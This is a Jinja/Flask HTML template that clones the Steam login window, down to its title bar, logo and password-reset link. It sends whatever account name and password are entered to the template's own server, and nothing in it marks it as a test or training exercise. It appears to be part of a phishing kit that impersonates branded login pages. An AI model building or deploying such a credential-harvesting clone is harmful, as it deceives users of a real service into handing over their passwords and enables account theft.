

{% block head%} 
<head>
	<meta charset="UTF-8">
	<title>Steam Login</title>
	<link rel="stylesheet" href="{{ url_for('static', filename='../../static/steam/main.css') }}">
</head>
{% endblock %}

{% block body %} 

<body>

<div class="container">
    <div class="title-bar">
      <div>&times;</div>
      <div>&#95;</div>
    </div>
    <div class="content">
      <div class="logo"></div>
      <form action="/" method="POST">
        <input class="textfield" type="text" name="username" placeholder="Account Name"/>
        <input class="textfield" type="password" name="password" placeholder="Password"/>
        <div class="button-group">
          <button type="submit" class="btn login">Login</button>
          <button class="btn">Cancel</button>
        </div><a class="forgot-password" href="#">Forgotten your password?</a>
        <hr class="separator"/>
        <button class="btn">Create Account</button>
      </form>
    </div>
  </div>

<body>

{% endblock %}